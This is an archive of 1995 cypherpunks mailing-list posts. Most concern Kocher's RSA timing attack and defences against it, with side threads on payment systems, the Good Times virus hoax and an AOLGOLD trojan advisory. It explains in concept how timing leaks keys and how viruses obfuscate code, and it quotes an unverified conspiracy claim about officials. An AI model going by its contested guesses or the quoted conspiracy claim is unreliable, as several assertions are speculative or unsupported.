Given that fact, a bounty is ludicrous.  We're not going to turn around
and pay you a bounty for doing exactly what we told you how to do!  A
bounty on crypto-payment-systems makes sense precisely because the
possible costs of a bug can be so high.

However, Sameer went on to write:

> 	Actually, Hack FV seems pretty pointless. Someone hacks FV,
> and a chargeback is issued on the credit card. Big deal. Same old
> outdated credit-card based payment systems.
> 	No more secure than credit cards.

This last line is not quite right.  The email loop that FV adds will, in
general, cause fraud to be detected far more quickly than it is detected
in today's credit card world.  Thus FV is a bit more robust (if not more
"secure", a word fraught with problems of definition) than the physical
credit card infrastructure.  Using encrypted credit cards on the net,
however, is demonstrably *less* secure/robust than the existing physical
credit card infrastructure, as the first-year paper also explains in
detail.

Finally, Bill and Sameer (jointly, sort of) provided a very brief
synopsis of the "does it matter?" part:

> > Besides, if you hack FV you've got the money :-)

> 	Uh, no you don't. I can't think of any ways you could hack FV
> and actually make money at it, because in the end the credit card
would just get a chargeback.

FV is vulnerable to several nuisance attacks, and we make no bones about
that fact.  We've even seen it happen a couple of times -- no money was
lost, and the culprit was persuaded to cease and desist via pressure
through his ISP.  But we've designed the system to be very robust in
protecting the actual money, which is what we believe MUST be a payment
system's first priority.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com> (FAQ & PGP key: nsb+faq@nsb.fv.com)
Chief Scientist, First Virtual Holdings

VIRTUAL YELLOW RIBBON==> http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 13 Dec 1995 01:27:58 +0800
To: gibo@ripco.com (Giles Bowkett)
Subject: Re: Timing Attack Paper
In-Reply-To: <v01530501acf1028a30f2@[192.0.2.1]>
Message-ID: <199512121321.IAA02041@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Giles Bowkett writes:
> http://www.cryptography.com/timingattack.html
> 
> and found the whole thing to be totally incomprehensible from
> a layman's point of view.  I apologize for having not read
> "Applied Cryptography", which might have made the abstract a
> simpler read - but even if I had I'd have been baffled by a
> lot of the terminology and equations in this paper.

If you had read and understood Applied Cryptography you would
understand the paper. I'm sorry, but to paraphrase a smarter man than
I, there is no royal road to cryptography. You have to study it.

The only thing that can be said to a layman is that different keys
will require different amounts of times to deal with different texts
in certain public key systems, so by timing how long it takes to
perform operations you can get information about the keys.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: combee@w3.org (Ben Combee)
Date: Wed, 13 Dec 1995 01:08:45 +0800
To: cypherpunks@toad.com
Subject: Re: EXON
In-Reply-To: <E343943A01502C79@-SMF->
Message-ID: <199512121612.KAA14837@matrix.eden.com>
MIME-Version: 1.0
Content-Type: text/plain


> Could someone please explain to me what this "EXON" thing is??

EXON is a control character sent to some terminals to stop input and
output.  To restore normal mode, you send an EXOFF.  See an ASCII
chart for the exact figures.

(Yes, I am just being a little sarcastic.  But, you know, EXON would
stop input and output, so the analogy is a little scary... anyway,
Exon is a gas station, right?)
-- 
        eebmoC .L nimajneB | Benjamin L. Combee                (REVERSE) 
       gro.doowhcet@eebmoc | combee@techwood.org           (ENGINEERING) 
\eebmoc\ten.kay.www\\:ptth | http://www.yak.net/combee/        (RESERVE)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 13 Dec 1995 01:21:21 +0800
To: jim@acm.org
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512111920.LAA24338@mycroft.rand.org>
Message-ID: <199512121525.KAA09078@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jim Gillogly wrote:

| > Nathaniel Borenstein <nsb@nsb.fv.com> writes:
| > Hey, don't go for constant time, that's too hard to get perfect.  Add a
| > *random* delay.  This particular crypto-flaw is pretty easy to fix. 
| > (See, I'm not *always* arguing the downside of cryptography!)
| 
| Random delay may be harder to get perfect than constant time.  Note that
| the actual time for the transaction is the minimum of all the transaction
| times you measure, since you can't add a negative delay to them.  It's
| presumably even easier if the random distribution is known.  Adding a
| random delay means more transactions are required to find each new bit,
| but information is still leaking.

	Does the delay have to be random, or does the total time for a
transacation need to be unrelated to the bits in the secret key?
Assume that the time added is pseudo-random (and confidential).
Further, for any non-overlapping group of N transactions, the
distribution of the times fits some predetermined curve, say a bell
curve.

	We've added a non random number, but since those numbers end
up being a curve, it would be difficult to determine which transaction
got which time added to it.  This resembles the 'make them all a
constant time', but allows us to send out some in a shorter time than
the maximum (although most transactions should probably take longer
than the average.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 13 Dec 1995 00:56:02 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <30CC0D31.293C@netscape.com>
Message-ID: <Pine.SUN.3.91.951212104716.29421B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Dec 1995, Jeff Weinstein wrote:

> 
>   While an exploit of this attack against our software has not
> been demonstrated, and there is some debate about whether it
> will even work, we are taking it very seriously.  We've been
> working with Paul to develop a fix, which we will implement
> even if the attack is never proven effective against our software.
> 

My gut & scribble-on-the-back-of-a-napkin feeling about this class of 
attack is that it could be a problem for smartcards (almost certainly), 
and possibly for non-routed networks (possibly - napkin was too small  
:-), but is not going to viable on internetworks where routers are in 
use; if a packet enters a queue at any point in its path, then the 
transit time will be quantised by the time it drains the queue, which is 
basically controlled by the time it takes to drain previously queued 
packets; this will destroy any microsecond level correlations that may 
have been leaked. Ron is supposed to be doing a presentation at WWW IV 
later this week - hopefully he'll give his opinion on this.

Definitely a really neat hack, even if it isn't always practical.

Simon
p.s.

 Someone mentioned adding random timings instead of padding out to a 
constant time. This won't work (adding noise doesn't destroy a signal - 
just increases the effort needed to isolate it)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 13 Dec 1995 05:29:44 +0800
To: cypherpunks@toad.com
Subject: Re: chaotic signal cryptography
Message-ID: <199512122008.MAA09312@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:00 PM 12/12/95 +0100, Anonymous wrote:
>>A few years back i ran thru a paper emanating
>>from a navy labs researcher (i think the name was Peccora)
>>about using synchronised chaotic signal generators as a
>>signal scrambling/encrytpion scheme.
>
>I too am interested in this technique.  I may be wrong, but it seems like
>a variation on the one-time pad.  Any comments on this technique (usefulness,
>robustness, etc.)?

1) It's not, repeat NOT, a one-time pad, or anything like one.
Synchronised generators on both ends of a communication are yet another
keyed algorithmic system, and are theoretically breakable; 
one-time pads are theoretically unbreakable (as long as you only use them
once, prevent theft, etc.).  Whether algorithmic systems are breakable 
in practice depends on how good the algorithms are, how good the keys are,
how much attention is paid to cracking them, etc.

2) Almost everything I've heard about chaotic cryptosystems has said
they're not very effective; it's too easy to predict the output.
They're fine random number generators for simulations, but they're
not cryptographically strong.

3) Maybe somebody's done something new and interesting in the field
and hasn't told the general public about it, but if you heard about it
a few years back it's been broken.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 13 Dec 1995 02:06:25 +0800
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512121525.KAA09078@homeport.org>
Message-ID: <9512121726.AA05382@all.net>
MIME-Version: 1.0
Content-Type: text


> Jim Gillogly wrote:
> 
> | > Nathaniel Borenstein <nsb@nsb.fv.com> writes:
> | > Hey, don't go for constant time, that's too hard to get perfect.  Add a
> | > *random* delay.  This particular crypto-flaw is pretty easy to fix. 
> | > (See, I'm not *always* arguing the downside of cryptography!)
> 
> 	Does the delay have to be random, or does the total time for a
> transacation need to be unrelated to the bits in the secret key?
> Assume that the time added is pseudo-random (and confidential).
> Further, for any non-overlapping group of N transactions, the
> distribution of the times fits some predetermined curve, say a bell
> curve.

Random time won't save you - it just increases the noise, thus reducing
the effective bandwidth of the covert channel.  To get the time, I only
need to do enough repetitions of the same computation to eliminate the
effect of the randomness and I have the same resulting information about
the key.

The only way to completely remove covert channels is by making the
measurable time completely independent of the actual time.

One way with the RSA might be to do the encryption with the key and the
inverse of the key (hence all 0s become 1s and 1s become 0s).

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Wed, 13 Dec 1995 06:04:14 +0800
To: cypherpunks@toad.com
Subject: Wanted: email for Calif senators & representatives
Message-ID: <9511128188.AA818800342@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Can someone send me, or the list, the email addresses for
the California senators and representatives?
                --Bob Baldwin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William J. Halverson" <wjhalv1@PacBell.COM>
Date: Wed, 13 Dec 1995 06:55:49 +0800
To: CYPHERPUNKS@toad.com
Subject: RE: F. Y. I.
Message-ID: <Chameleon.4.01.951212124559.wjhalv1@N93894.snfc370.pacbell.com>
MIME-Version: 1.0
Content-Type: text/plain



                                                            If  the 
>>>>>>>computer contains  a hard  drive, that  will most  likely be 
>>>>>>>destroyed.   If the  program is  not stopped,  the computer's 
>>>>>>>processor will be placed in an nth-complexity infinite binary 
>>>>>>>loop -which can severely damage the processor if left running 
>>>>>>>that way too long.


Hmmmm ... so now we see that using CPUs 'too much' will damage the
processor ...

Hmmm ... I guess it runs out of oil???

Heh heh heh ...

----------------------------------------------------------------
Bill Halverson    Pacific  Bell    Sent 12:45:46 PDT on 12/12/95 
PH 415 542 6564  wjhalv1@pacbell.com            FAX 415 542 4744 
"The views of the author are not those of his employer ... yet."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 13 Dec 1995 04:31:34 +0800
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512121525.KAA09078@homeport.org>
Message-ID: <199512121759.MAA09353@homeport.org>
MIME-Version: 1.0
Content-Type: text



	Nope, I'm wrong, as Fred and Simon point out.  The noise makes
finding the times more difficult by some small factor, nothing more.
I'll stop writing these things in the morning. :)

I wrote:

| 	Does the delay have to be random, or does the total time for a
| transacation need to be unrelated to the bits in the secret key?
| Assume that the time added is pseudo-random (and confidential).
| Further, for any non-overlapping group of N transactions, the
| distribution of the times fits some predetermined curve, say a bell
| curve.
| 
| 	We've added a non random number, but since those numbers end
| up being a curve, it would be difficult to determine which transaction
| got which time added to it.  This resembles the 'make them all a
| constant time', but allows us to send out some in a shorter time than
| the maximum (although most transactions should probably take longer
| than the average.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
Date: Wed, 13 Dec 1995 05:47:36 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: EXON
Message-ID: <199512122017.OAA20584@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Mon, 11 Dec 1995 23:10:25 -0800 (PST)
> From:          Rich Graves <llurch@networking.stanford.edu>
> To:            Scott Binkley <SBinkley@atitech.ca>
> Cc:            High Society List <cypherpunks@toad.com>
> Subject:       Re: EXON

> On 11 Dec 1995, Scott Binkley wrote:
> 
> > Could someone please explain to me what this "EXON" thing is??
> 
> A nucleic acid chain (RNA or DNA) is composed of exons, which are 
> "active" sequences of nucleotides that are expressed as polypeptides, and 
> "introns," what is known as "junk DNA." Only about 2% of the 6 billion or 
> so base pairs that make up the human genome are exons.
> 
> (There is some controversy in molecular biology circles as to whether 
> "junk DNA" is really "junk" just because it doesn't build proteins. It 
> could perform a regulatory or "frame-check" function.)

Actually, I think that once the matter is further studied, scientists 
will discover that the "junk DNA" is not junk, but inactive DNA, 
waiting for a "trigger".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 14 Dec 1995 00:10:22 +0800
To: ljo@ausys.se
Subject: Re:  Blinding against Kocher's timing attacks
Message-ID: <199512122127.NAA15216@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: ljo@ausys.se (Johansson Lars)
> Does anyone know whether David Chaum's patent on
> blind digital signatures extends to this application?

I don't think it would.  Chaum's blinding protocol has one major
difference: the blinding factor is applied by a different person than
the one doing the signing.  The purpose of the blinding is different,
too; in Chaum's case the idea is to end up with a signature which is
unknown to the signer, while with Kocher's "defensive blinding" the
signature (or decryption) is an ordinary RSA one, and the blinding is
just done internally by the signer to randomize the timing.

(I gather BTW that the idea of the blinding is for the server to have
pre-chosen a random r and pre-calculated r^d mod n, and then when he is
given c to decrypt he first does c*r mod n and then decrypts this, then
takes the result and divides by r^d.)

It's conceivable that Kocher's blinding would be a patentable technique
in itself, and not impossible that he has already applied for a patent
before publishing.  Probably he would have said so if that were his
intention, though.

Hal

"Blind defensively - watch out for the other guy..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 13 Dec 1995 05:09:37 +0800
To: "David E. Smith" <dsmith@midwest.net>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512121533.JAA21362@cdale1.midwest.net>
Message-ID: <Pine.BSF.3.91.951212132638.29192C-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Dec 1995, David E. Smith wrote:

> At 04:45 AM 12/12/95 -0500, Black Unicorn wrote:
> 
> >> | PS - I think Paul was a bit surprised when Jim Barksdale pulled
> >> | out his wallet and handed him 10 crisp $100 bills.  :-)
> >> Great.  mention it where the IRS is sure to be listening.  :)
> >Why would the IRS listen?  Everyone knows the tax system is voluntary.
> 
> Do you know something I don't?  :)
> Would you mind sharing?  :)

Try misc.taxes for the tax protestor arguments (which fail of course).  
But by asking, you may be on "their" list (and I don't mean a list held 
by tax protestors but by a TLA).  And if you're reallllllly bad about it, 
one of my buddies may decide to invite you in ...

EBD


> 
> Dave
> ----- David E. Smith, c/o Southeast Missouri State University
> 1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 13 Dec 1995 05:26:20 +0800
To: cypherpunks@toad.com
Subject: (dcsb) CIS SEMINAR--December 15--Manasse, Micali, Rivest, Shamir--2:00pm
Message-ID: <v02120d01acf389509e4c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: lethin@ai.mit.edu (Rich Lethin)
Date: Tue, 12 Dec 1995 14:12:26 -0500
To: bsdc@ai.mit.edu
Subject: [joanne@theory.lcs.mit.edu: CIS SEMINAR--December 15--Manasse,
Micali, Rivest, Shamir--2:00pm]
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: lethin@ai.mit.edu (Rich Lethin)


Seminar at MIT.

Return-Path: <joanne@theory.lcs.mit.edu>
From: joanne@theory.lcs.mit.edu (Joanne Talbot)
Date: Tue, 12 Dec 95 12:38:38 EST
To: theory-seminars@theory.lcs.mit.edu
Reply-To: theory-seminars-request@theory.lcs.mit.edu
Subject: CIS SEMINAR--December 15--Manasse, Micali, Rivest, Shamir--2:00pm

**Of interest.

                         CIS-SEMINAR

Title:          Micropayment schemes, light-weight signatures, and
                        public-key certification
Speakers:       Mark Manasse, Ron Rivest, Adi Shamir, and Silvio Micali
Time:           2:00-3:30 Friday, December 15th, 1995
Where:          Room NE43-518, 545 Technology Square

Abstract:

We present four short talks on related subject matter:

(1) Mark Manasse will present his micropayment scheme "Millicent".
(2) Ron Rivest will present the "PayWord" micropayment scheme.
(3) Adi Shamir will present the "MicroMint" micropayment scheme.
(4) Silvio Micali will present an enhanced certificate revocation system.

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 13 Dec 1995 10:48:18 +0800
To: cypherpunks@toad.com
Subject: Spotty c'punks service due to network outages
Message-ID: <9512122235.AA14507@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Our network service is going up and down, probably due to the storms
in San Francisco.  If you see delays, that's the reason why.  As far
as I know, NSA has not figured out how to control the weather, so it's
not their fault :-).

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Webmaster@fornits.com (Ginger Warbis)
Date: Wed, 13 Dec 1995 05:27:23 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape announces position against GAK
Message-ID: <199512121939.OAA17633@www2.clever.net>
MIME-Version: 1.0
Content-Type: text/plain


>On Fri, 8 Dec 1995, James A. Donald wrote:
>
>> At 04:27 AM 12/9/95 -0800, Timothy C. May wrote:
>> >Credit where credit is due.
>> >
>> >I for one am satisfied--and even pleased--with the Netscape position on GAK.
>> 
>> Well I for one, am serious unsatisfied, but it is not so bad as
>> to merit a campaign against Netscape.
>
>I think it's a good start.  I would like to see how much effort after 
>this really pans out.  Doesn't take much to put out a policy statement.  
>Takes a lot to follow it through.
>

Greetings all. May I also point out that the power of self government is at
least as effective when rewarding good behavior as when punishing bad. You
guys are the experts in this particular political niche, but from the
viewpoint of a more or less innocent stander-by, the statement sounded to me
like "OK, we went, we listened, they were full of shit, the line is HERE."
and I'm quite satisfied.
--
Bill & or Ginger Warbis
WebMaster@Fornits.com - http://fornits.com/
"The more corrupt the state, the more numerous the laws."
Tacitus, Roman senator and historian (A.D. c.56- c.115)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 13 Dec 1995 05:44:34 +0800
To: ecarp@netcom.com
Subject: Re: Jim Quinn interview of James Norman (edited)
In-Reply-To: <199512120247.SAA12705@nova.unix.portal.com>
Message-ID: <199512121953.OAA03720@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



According to the headers, you, Mr. Carp, forwarded this to
Cypherpunks, when it was obviously available to those that wanted to
read it on a variety of other mailing lists.

Please don't continue doing this.

Jon Roland writes:
> The following is a Radio Interview between James Norman, 
> formerly Senior Editor of Forbes Magazine and now with Media 
> Bypass Magazine and Jim Quinn, DJ of WRRK 96.9 FM in Pittsburgh. 
> In this interview from December 7th, they discuss issues of 
> national importance and STUNNING IMPACT. Essentially they give 
> out the reason for Vincent Foster's Death, and the fact that 
> the "resignations" of the Congresspersons are NOT for policy 
> reasons but because they have been caught with millions in 
> corrupt funds in Swiss Banks. Read this to learn what the 
> "mainstream media" doesn't ever tell you... 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Wed, 13 Dec 1995 17:31:54 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512121525.KAA09078@homeport.org>
Message-ID: <30CE08D2.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> 
> One way with the RSA might be to do the encryption with the key and
> the inverse of the key (hence all 0s become 1s and 1s become 0s).

Nope, this doesn't work.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Wed, 13 Dec 1995 06:12:22 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: EXON [Noise]
In-Reply-To: <199512122017.OAA20584@khijol>
Message-ID: <Pine.A32.3.91.951212150845.27478H-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> > (There is some controversy in molecular biology circles as to whether 
> > "junk DNA" is really "junk" just because it doesn't build proteins. It 
> > could perform a regulatory or "frame-check" function.)
> 
> Actually, I think that once the matter is further studied, scientists 
> will discover that the "junk DNA" is not junk, but inactive DNA, 
> waiting for a "trigger".

Sorta like that episode of Star Trek where all this DNA gets combined 
into a 3-D Quicktime movie?

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Wed, 13 Dec 1995 05:49:29 +0800
To: WheatonB@603cs.croughton.af.mil
Subject: Re: F. Y. I.
In-Reply-To: <9511128188.AA818815409@603cs.croughton.af.mil>
Message-ID: <Pine.3.89.9512121515.A16552-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


Good times is an old hoax. ignore it

AOLGOLD referenced by another poster is real but kind of dumb.

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Wed, 13 Dec 1995 06:05:04 +0800
To: cypherpunks@toad.com
Subject: Re: <None>
In-Reply-To: <E243943A01502C79@-SMF->
Message-ID: <Pine.LNX.3.91.951212160331.216A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 11 Dec 1995, Scott Binkley wrote:

> A long time ago, I read about a program that would take a picture, and 
> replace the LSB of every pixel
> in the picture with your message.  I'm wondering, Is the source code for 
> this program availible anywhere
> on the net???
> 
> 

The program is at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/steganography/jsteg/.  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM3uxbZc+sv5siulAQGL+QP9FDfd7ftarbT0znpmefH52KP9fUmSbomr
QhTTnTwAbzul6F1RGFomSMfpev5BD6+WaaoGuLarbLP6sSeeGpHNWSVBMfsBiay1
7yz0P5p8w6nv62E/3jG3SPtdzehk5x1yij1wzDibXHcI3NKtkwatofLzuMwigs0R
HRzRWxwQPsE=
=PBrg
-----END PGP SIGNATURE-----


finger markm@voicenet.com for Public Key http://www.voicenet.com/~markm/
Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jadestar@netcom.com (JaDe)
Date: Wed, 13 Dec 1995 10:20:22 +0800
To: WheatonB@603cs.croughton.af.mil
Subject: Re: F. Y. I.
In-Reply-To: <9511128188.AA818815409@603cs.croughton.af.mil>
Message-ID: <199512130009.QAA16527@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
>      To all.  This is something I received from a fellow Internet user in 
>      the States.  I don't know where he got this info, but I thought we may 
>      all benefit from this warning.
>      
>      SrA Lounsbury sends...
> 
> >>>>>>SUBJECT:  VIRUSES--IMPORTANT PLEASE READ IMMEDIATELY 
> >>>>>>line "Good  Times",   DO NOT  read  the  message,  DELETE  it 

	I've been employed by two of the largest and most well-known
	Anti-Virus software companies in the world (Symantec and now
	McAfee).

	I've supported a wide variety of anti-virus products.

	I can assure you that this is a hoax.  There is currently 
	no known mechanism by which an e-mail message could "infect"
	and "propagate" independent of OS and MUA.  In other words
	it would require a specific combination of operating system
	and platform and/or a specific mail reading program 
	to transparently execute code (macros whatever) inside of a
	mail message.

	Java, LiveScript, and Microsoft's transparent MSN hooks
	could allow these sorts of things in the future (through
	suitably *bad* client software.  Also I've heard that 
	the e-mail package included with WordPerfect Office can
	execute some binary attachments, automatically.

	Other than those two exceptions I know of know way that this
	would be feasible.

	On comp.virus (or was it alt.comp.virus??) there was considerable
	(and heated) debate about the feasibility (and possible 
	*desirability <g>) of a trojan horse that would be specific to
	a client (like AOL's proprietary access software) and would
	pipe in some data to exploit some as yet undiscovered bug
	(like the famous fingerd buffer overflow) to force execution
	of CPU specific machine code.

	In any event these would not be "viruses" in the traditional
	computer sense of the term.  Virus researchers naturally have
	to distinguish between worms, logic bombs, trojan horses,
	droppers, and various types of virus.  There is considerable
	literature on these distinctions (which I have neither the
	time nor the expertise to attempt to duplicate here).

		(and there was much rejoicing).

	All of this has little to do with cryptography.  

	The cryptography used in computer viruses is generally not very
	sophisticated.  the primary constraints are compactness of
	algorithm and convenience of the implementation with respect to
	a given processor.  The only purpose is to obuscate the code --
	try to limit the efficiency or effectiveness of signature based
	scanning engines.  Mostly they use self-modifying code loops
	with XOR's and simple ADD's and SUB's.   I heard of one that
	PUSHed all it's code onto the stack and then did a simple FAR
	JMP to it (apparently quite compact).

	Finally I'd like to recommend that people please restrain
	themselves from forwarding press releases from various	
	sources to other mailing lists that "might be interested."

	Most of us are big boys and girls.  If our interest is
	sufficiently broad, we'll go subscribe to those other lists
	or newsgroups.

	If you insist on referring to things from other sources --
	perhaps a short query (like "Say does anyone here think the
	'Good Times' virus has anything to do with with cryptography?"
	and "Well, if your interested you can find out more about it
	on foo -- or ask and I'll forward a copy") will be more 
	conservative of our time and bandwidth.

	(Now y'all can flame me for wasting this much on a largely
	off-topic response -- but please feel free to direct those
	flames to /dev/null or to *just me*).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ljo@ausys.se (Johansson Lars)
Date: Wed, 13 Dec 1995 01:26:07 +0800
To: cypherpunks@toad.com
Subject: Blinding against Kocher's timing attacks
Message-ID: <95Dec12.160243gmt+0100.53783@void.ausys.se>
MIME-Version: 1.0
Content-Type: text/plain




Ron Rivest wrote (at sci.crypt):
>The simplest way to defeat Kocher's timing attack is to ensure that the
>cryptographic computations take an amount of time that does not depend on 
the
>data being operated on.  For example, for RSA it suffices to ensure that
>a modular multiplication always takes the same amount of time, independent 
of
>the operands.
>
>A second way to defeat Kocher's attack is to use blinding: you "blind" the
>data beforehand, perform the cryptographic computation, and then unblind
>afterwards.  For RSA, this is quite simple to do.  (The blinding and
>unblinding operations still need to take a fixed amount of time.) This 
doesn't
>give a fixed overall computation time, but the computation time is then a
>random variable that is independent of the operands.

Does anyone know whether David Chaum's patent on
blind digital signatures extends to this application?

Kind regards,
/Lars Johansson

ljo@ausys.se
http://www.ausys.se/defaulte.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WheatonB@603cs.croughton.af.mil
Date: Wed, 13 Dec 1995 01:46:03 +0800
To: CYPHERPUNKS@toad.com
Subject: AOGOLD Trojan Program
Message-ID: <9511128188.AA818815153@603cs.croughton.af.mil>
MIME-Version: 1.0
Content-Type: text/plain


     FYI.  Thanks.
     
     ... Kev
     

Kevin P. Knox, SSgt, USAF

Systems Administrator, IP Network Manager
Novell Certified NetWare Engineer

Royal Air Force Croughton, United Kingdom
Near Brackley, Northamptonshire

My PGP public key can be obtained via anonymous FTP from
nsc.croughton.af.mil (131.56.128.5)


     
     
     From:             pch@assist.mil
     Subject:          ASSIST 95-46, AOLGOLD Trojan Program.
     To:               assist-bulletin@assist.mil
     Date sent:        Mon, 4 Dec 1995 16:06:54 -0500 (EST)
     Copies to:        assist@assist.mil
     
     
     -----BEGIN PGP SIGNED MESSAGE-----
     
     <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
         
               Automated Systems Security Incident Support Team
                                                     _____
                  ___   ___  _____   ___  _____     |     /
           /\    /   \ /   \   |    /   \   |       |    / Integritas
          /  \   \___  \___    |    \___    |       |   <      et
         /____\      \     \   |        \   |       |    \ Celeritas
        /      \ \___/ \___/ __|__  \___/   |       |_____\
     <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
         
                            Bulletin  95-46
      
            Release date: 4 December, 1995, 4:00 PM EST (GMT -5)
     
     SUBJECT: AOLGOLD Trojan Program.
     
     SUMMARY:  A trojan program called AOLGOLD.ZIP that deletes c: 
     drive files when executed is being distributed around America Online 
     and other networks.
     
     BACKGROUND: The AOLGOLD Trojan program was recently discovered on 
     America Online (AOL).  Notice about the Trojan has been circulated 
     to all America Online subscribers.  An e-mail message that contained
     an attached archive file named AOLGOLD.ZIP was circulated on AOL.
     A README file that is in the archive describes the fictitious AOLGOLD 
     as a new and improved interface for the AOL online service.  Reading
     or downloading the included file will not damage your system, the
     trojaned program must be executed for damage to occur.
     
     If you unzip the archive, you get two files: INSTALL.EXE and 
     README.TXT.  The README.TXT file again describes AOLGOLD as a new 
